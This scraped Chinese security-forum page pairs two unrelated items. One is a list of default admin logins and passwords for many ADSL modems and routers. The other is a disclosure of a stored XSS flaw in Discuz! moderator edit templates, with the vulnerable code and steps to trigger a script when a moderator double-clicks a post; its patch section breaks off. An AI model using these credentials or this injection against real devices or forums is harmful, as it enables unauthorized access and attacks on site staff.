机,保持几十秒就可以恢复出厂默认 值。 7、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root 8、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234 9、华为SmartAX MT800的初始IP是192.168.1.1,用户名和密码都为ADMIN,恢复默认配置的方法有两种,
一种是连续按MODEM背后的RESET键三 次,另一种是在配置菜单的SAVE&amp;REBOOT里选择恢复默认配置
伊泰克 http://192.168.1.1/ 用户名:supervisor 密码:12345
华硕 http://192.168.1.1/ 用户名:adsl 密码:adsl1234
阿尔卡特 http://192.168.1.1/ 一般没有密码
同维DSL699E http://192.168.1.1/ 用户名:ROOT 密码:ROOT
大亚DB102 http://192.168.1.1/ 用户名:admin 密码:dare 高级设置界面:http://192.168.1.1/doc/index1.htm WST的RT1080 http://192.168.0.1/ username:root password:root
WST的ART18CX http://10.0.0.2/ username:admin password:conexant username:user password :assword
全向qxcomm1688 http://192.168.1.1/ 高端设置密码是:qxcommsuport
全向qxcomm1680 http://192.168.1.1/ 登陆ADSL的密码是:qxcomm1680
实达 V3.2 root root V5.4 root grouter
泛德 admin conexant
东信Ea700 http://192.168.1.1/ 用户名:空 密码:password
broadmax的hsa300a http://192.168.0.1/ username:broadmax password:broadmax
长虹ch-500E http://192.168.1.1/ username:root password:root
重庆普天CP ADSL03 http://192.168.1.1/ username:root password:root
台湾突破EA110 RS232:38400 http://192.168.7.1/ username SL psw SL
etek-td的ADSL_T07L006.0 http://192.168.1.1/ User Name: supervisor Password: 12345 忘记密码的解决办法: 使用超级终端的Xmodem方式重写Vxworks.dlf,密码恢复成:12345
GVC的DSL-802E/R3A http://10.0.0.2/ username:admin password:epicrouter username:user password assword
科迈易通km300A-1
<TABLE cellSpacing=0 cellPadding=0 width="98%" border=0>


http://192.168.1.1/ username: password assword 科迈易通km300A-G http://192.168.1.1/ username:root password:root 科迈易通km300A-A http://192.168.1.1/ username:root or admin password:123456 sunrise的SR-DSL-AE http://192.168.1.1/ username:admin password:0000 sunrise的DSL-802E_R3A http://10.0.0.2/ username:admin password:epicrouter username:user password assword UTStar的ut-300R http://192.168.1.1/ username:root or admin password:utstar 路由品牌名:viking 帐号:adsl 密码:adsl1234 帐号:root 密码:grouter 路由品牌名:mt800 帐号:admin 密码:admin 路由品牌名:home gateway 帐号:user 密码:password</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz!通用版本触发事件xss bug
触发事件xss 利用机会不高
由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个XSS漏洞. 一 分析 在文件1_modcp_editpost.tpl.php里代码: .....<? } elseif($action == 'editmessage') { ?><textarea type="text" id="message_<?=$pid?>" name="message_<?=$pid?>" style="width: 80%; height: 200px; overflow: visible" ondblclick="doane(event)"><?=$orig['message']?></textarea><p style="margin: 5px; text-align: center;"><button type="button" value="true" class="submit" onclick="submitmessage('<?=$pid?>');this.disabled=true">提交</button>  <button type="button" class="submit" onclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$pid?>&amp;tid=<?=$tid?>&amp;editmessagesubmit=yes&amp;inajax=1&amp;do=notupdate', 'postmessage_<?=$pid?>')">取消</button></p><script type="text/javascript">......<?=$orig['message']?>没有过滤导致xss. 进入以上的代码的有2处: 1. 1_viewthread.tpl.php里: 00278: <td class="postcontent" <? if($forum['ismoderator'] &amp;&amp; ($thread['digest'] >= 0 || !$post['first'])) { ?> ondblclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$post['pid']?>&amp;tid=<?=$post['tid']?>', 'postmessage_<?=$post['pid']?>')"<? } ?>>00279: <div class="postinfo">通过ondblclick事件触发ajaxget去访问. 2. Beijing2008forumdisplay.htm 00224: </td>00225: <th class="$thread[folder]" {if $forum['ismoderator']} ondblclick="ajaxget('modcp.php?action=editsubject&amp;tid=$thread[tid]', 'thread_$thread[tid]', 'specialposts');doane(event);"{/if}>00226: <label>同上下面的利用是用的1_viewthread.tpl.php里的方法. 二 利用 步骤: 1.发表新贴 ->帖子内容:<script>alert('www.sitedir.com.cn')</script> 2.对帖子有管理权限的用户"双击"讨论帖进入便捷编辑模式,将触发XSS. 三 补丁[fix] 缺


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表